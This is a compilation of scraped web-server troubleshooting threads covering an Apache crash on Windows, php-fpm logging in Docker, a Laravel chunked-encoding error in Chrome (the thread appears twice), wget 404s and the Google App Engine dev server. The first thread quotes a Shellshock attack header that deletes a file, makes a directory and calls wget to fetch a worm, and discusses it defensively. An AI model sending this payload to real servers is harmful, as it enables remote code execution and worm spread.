Hi Friends,
I am using Ampps server with php 5.3.29 in windows server datacenter.
unfortunately i am getting the following prompt in windows server and my site down.
Prompt title:
Microsoft windows
Prompt Message:
Apache http server has stopped working.
A problem caused the program to stop working correctly. windows will close the program and notify you if a solution is available.
Trace:
When i tracing error and access logs, i found the following logs as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.
There is a Web bot trying to get authority so it can wget and execute something like S0.py, which I imagine is a worm so the download server is compromised.
Id like a copy of S0.sh if you happen to get one give it to exploit-db or something like it.
The clever command is:
Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"
If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The message indicates that the file does not exist, as indicated by the 404 error and the message "script not found".
Finally i denied those client to access the cgi-bin directory.
in cgi-bin directory i created a .htaccess file
I added following line in .htaccess
Deny From all.
I don't think authLogin.cgi really matters other than it might allow someone to execute. The problem is that the user tries to or successfully removes /tmp/S0.sh and make a directory php in the share folder and then execute wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this action and initially no one knew to call it Shellshock. There is a copy of S0.sh there and you can see it's a worm, which I presumed was the case.
From what I read the worm is just browsing the IP space looking for anyone listening to port 8080.
Related
I have a php docker app running with multiple containers such as
j_php-fpm_1 and j_nginx_1
j_php-fpm_1 is the container with the whole project (Magento / php but that's not relevant here).
My issue is the following
At some point in the app I trigger A technical problem with the server created an error. Try again to continue what you were doing. If the problem persists, try again later. which means I have a server error within my php even before entering the framework.
So I have been into my j_php-fpm_1 but the file can't be read due to permission denied
make bash
docker-compose exec -u magento php-fpm bash
magento#315933593d37:/var/www/magento$ ls -al /var/log/php7.3-fpm.log -rw------- 1 root root 0 Jan 3 10:04 /var/log/php7.3-fpm.log
magento#315933593d37:/var/www/magento$
cat: /var/log/php7.3-fpm.log: Permission denied
Then I tried to check the live nginx logs
docker logs j_nginx_1
As a result I see my request triggering the error, but still no errors printed in the log
172.21.0.1 - - [05/Jan/2022:15:22:34 +0000] "POST /admin_sdj/sponsorship/index/sponsorship/key/d81ba9d66a439a3fe7a2e70e9567830be8b3a1cef39f8984002129045622fb59/id/1/?isAjax=true HTTP/1.1" 200 190 "http://j.dev-cpy.fr/admin_sdj/customer/index/edit/id/1/key/05dae1e3543127f8c02295e29b06b70722d085f69a37b0d7155fc257ce6b1257/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
access log and error log from the ngning container are empty.
Any ideas where I can find my error log ?
PS : I can't change the php fpm logfile rights.
EDIT : Connecting as root with docker exec -it --user root j_php-fpm_1 /bin/bash shows the fpm log file is empty too.
I don't know where to look at anymore
I found the my error's origin; it was actually due to a wrong url path triggering a 404 error...which was triggering then the server error in some following request. Still no idea about the logs though, but at least my issue is solved right now. I let the topic open in case someone has an idea.
This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view that which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4
Does anybody knows how can I fix this?
Had the same problem on a Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 that one day surprisingly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box nginx lib directory permissions ll /var/lib/
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where internally was using www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting here to notice the solution, even all the credits should go to the linked original comment.
I had the exact same problem that you have. I found a work-around over here on this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided a the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to just up and tell Chrome how much data to expect for every request, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
// Fixes a strange issue with Chrome. Should theoretically be removeable
// after upgrading PHP to 5.5 from 5.4
if ($response instanceof Illuminate\Http\Response) {
$response->header('Content-Length', strlen($response->getOriginalContent()));
}
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.
This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view that which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4
Does anybody knows how can I fix this?
Had the same problem on a Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 that one day surprisingly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box nginx lib directory permissions ll /var/lib/
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where internally was using www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting here to notice the solution, even all the credits should go to the linked original comment.
I had the exact same problem that you have. I found a work-around over here on this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided a the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to just up and tell Chrome how much data to expect for every request, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
// Fixes a strange issue with Chrome. Should theoretically be removeable
// after upgrading PHP to 5.5 from 5.4
if ($response instanceof Illuminate\Http\Response) {
$response->header('Content-Length', strlen($response->getOriginalContent()));
}
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.
I have a Red Hat linux box with apache running several domains, including a.com and b.com.
I have a php script a.com/wget.php, which makes an exec() call to download a file on the local domain b.com. Running the php script from the command line is successful.
But running this script from a web page results in a 404 error. The command is:
/usr/bin/wget -k -S --save-headers --keep-session-cookies
-O <local-file-name> -o <local-log-file-name> -U \"Mozilla/5.0
(Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101
Firefox/24.0\" --max-redirect=100 "http://b.com/page.php"
No log messages are written to the Apache access log file for domain b.com for this call.
BUT the server access log file (/var/log/httpd/access_log) is NOT empty, it shows that there was an attempt made to open page "/page.php" on the server (the link in access log has no domain).
xx.xx.xx.xx - - [19/May/2014:12:02:49 +0100] "GET /page.php
HTTP/1.0" 404 285 "-" "Mozilla/5.0 (Macintosh;
Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0"
Server error log (/var/log/httpd/error_log) gives this error:
[Mon May 19 12:02:49 2014] [error] [client xx.xx.xx.xx]
File does not exist: /var/www/vhosts/default/htdocs
So it would seem that something is stripping the domain name from "http://b.com/page.php" and the resulting URL that wget is trying to connect to is "/page.php". This will not work, given that the server has many domains on it.
Has anyone come across this? Is there some setting in wget or php or apache that would cause this to not happen? I tried different things based on suggestions regarding similar problems, but nothing has worked so far.
Thanks.
The problem turned out to be not in wget, but in firewall settings. The wget call, executed from behind the firewall, was resolving the domain to an external IP address, and connections to the external IP address were failing. Correcting this in the firewall fixed the wget problem.
I'm going through the helloworld tutorial for Google App Engine using PHP (https://developers.google.com/appengine/docs/php/gettingstarted/helloworld). After getting the application set up and ready to go the tutorial tells me to start the web server included with the Google App Engine SDK using the command: google_appengine/dev_appserver.py --php_executable_path= helloworld/. How exactly do I start the web server and where do I put that command in?
After you install the SDK on your machine you'll have a google_appengine directory. I run Windows so mine is located at:
C:\Program Files (x86)\Google\google_appengine
Inside that directory is a python script called "dev_appserver.py" which is what the tutorial wants you to run. Your local machine should also have PHP installed and the script is looking for the location to that since it would be something you'd install yourself.
You'll execute this script from whatever local command line application your OS has (shell for Linux, terminal in Mac, Command Prompt or Powershell in Windows).
I execute mine from the folder one level above my GAE application is stored. To ensure you can properly execute this command, run it with no parameters and you should see this:
python "C:\Program Files (x86)\Google\google_appengine\dev_appserver.py"
Output:
usage: dev_appserver.py [-h] [--host HOST] [--port PORT]
[--admin_host ADMIN_HOST] [--admin_port ADMIN_PORT]
[--auth_domain AUTH_DOMAIN] [--storage_path PATH]
[--log_level {debug,info,warning,critical,error}]
[--max_module_instances MAX_MODULE_INSTANCES]
[--use_mtime_file_watcher [USE_MTIME_FILE_WATCHER]]
[--threadsafe_override THREADSAFE_OVERRIDE]
[--php_executable_path PATH]
[--php_remote_debugging [PHP_REMOTE_DEBUGGING]]
[--python_startup_script PYTHON_STARTUP_SCRIPT]
[--python_startup_args PYTHON_STARTUP_ARGS]
[--blobstore_path BLOBSTORE_PATH]
[--mysql_host MYSQL_HOST] [--mysql_port MYSQL_PORT]
[--mysql_user MYSQL_USER]
[--mysql_password MYSQL_PASSWORD]
[--mysql_socket MYSQL_SOCKET]
[--datastore_path DATASTORE_PATH]
[--clear_datastore [CLEAR_DATASTORE]]
[--datastore_consistency_policy {consistent,random,time}]
[--require_indexes [REQUIRE_INDEXES]]
[--auto_id_policy {sequential,scattered}]
[--logs_path LOGS_PATH]
[--show_mail_body [SHOW_MAIL_BODY]]
[--enable_sendmail [ENABLE_SENDMAIL]]
[--smtp_host SMTP_HOST] [--smtp_port SMTP_PORT]
[--smtp_user SMTP_USER]
[--smtp_password SMTP_PASSWORD]
[--prospective_search_path PROSPECTIVE_SEARCH_PATH]
[--clear_prospective_search [CLEAR_PROSPECTIVE_SEARCH]]
[--search_indexes_path SEARCH_INDEXES_PATH]
[--clear_search_indexes [CLEAR_SEARCH_INDEXES]]
[--enable_task_running [ENABLE_TASK_RUNNING]]
[--allow_skipped_files [ALLOW_SKIPPED_FILES]]
[--api_port API_PORT]
[--automatic_restart [AUTOMATIC_RESTART]]
[--dev_appserver_log_level {debug,info,warning,critical,error}]
[--skip_sdk_update_check [SKIP_SDK_UPDATE_CHECK]]
[--default_gcs_bucket_name DEFAULT_GCS_BUCKET_NAME]
yaml_files [yaml_files ...]
dev_appserver.py: error: too few arguments
My command to get this working properly was:
python "C:\Program Files (x86)\Google\google_appengine\dev_appserver.py" --port 8082 --admin_port 8083 --php_executable_path "C:\Program Files (x86)\NuSphere\PhpED\php54\php-cgi.exe" helloworld\
I got this output in Powershell and was able to hit the local url and see "Hellow, World!"
INFO 2013-10-22 16:04:27,039 sdk_update_checker.py:245] Checking for updates to the SDK.
INFO 2013-10-22 16:04:28,368 sdk_update_checker.py:261] Update check failed: HTTP Error 404: Not Found
WARNING 2013-10-22 16:04:28,398 api_server.py:332] Could not initialize images API; you are likely missing the Python "PIL" module.
INFO 2013-10-22 16:04:28,405 api_server.py:139] Starting API server at: http://localhost:52150
INFO 2013-10-22 16:04:28,408 dispatcher.py:171] Starting module "default" running at: http://localhost:8082
INFO 2013-10-22 16:04:28,411 admin_server.py:117] Starting admin server at: http://localhost:8083
INFO 2013-10-22 16:04:31,980 module.py:608] default: "GET / HTTP/1.1" 200 13
INFO 2013-10-22 16:04:32,223 module.py:608] default: "GET /favicon.ico HTTP/1.1" 200 13
The Google cloud SDK comes with a Launcher in which you could add project files and examine the logs in the GUI. I used python code here but it should behave the same with php.
Go to Google App Engine Launcher -> Select File -> Add Existing Application -> Browse and select the root directory of your PHP/Python/Java/Go application -> Add -> Click Run button -> Click Logs
2014-12-30 01:02:57 Running command: "['C:\\Users\\gung13\\Anaconda\\pythonw.exe', 'C:\\Program Files\\Google\\Cloud SDK\\google-cloud-sdk\\platform\\google_appengine\\dev_appserver.py', '--skip_sdk_update_check=yes', '--port=9080', '--admin_port=8001', u'C:\\Users\\gung13\\Desktop\\appengine-try-python-flask']"
INFO 2014-12-30 01:02:57,874 devappserver2.py:745] Skipping SDK update check.
INFO 2014-12-30 01:02:57,903 api_server.py:172] Starting API server at: http://localhost:62234
INFO 2014-12-30 01:02:57,905 dispatcher.py:186] Starting module "default" running at: http://localhost:9080
INFO 2014-12-30 01:02:57,907 admin_server.py:118] Starting admin server at: http://localhost:8001
INFO 2014-12-30 01:03:21,677 module.py:718] default: "GET / HTTP/1.1" 200 13
INFO 2014-12-30 01:03:21,986 module.py:718] default: "GET /favicon.ico HTTP/1.1" 404 27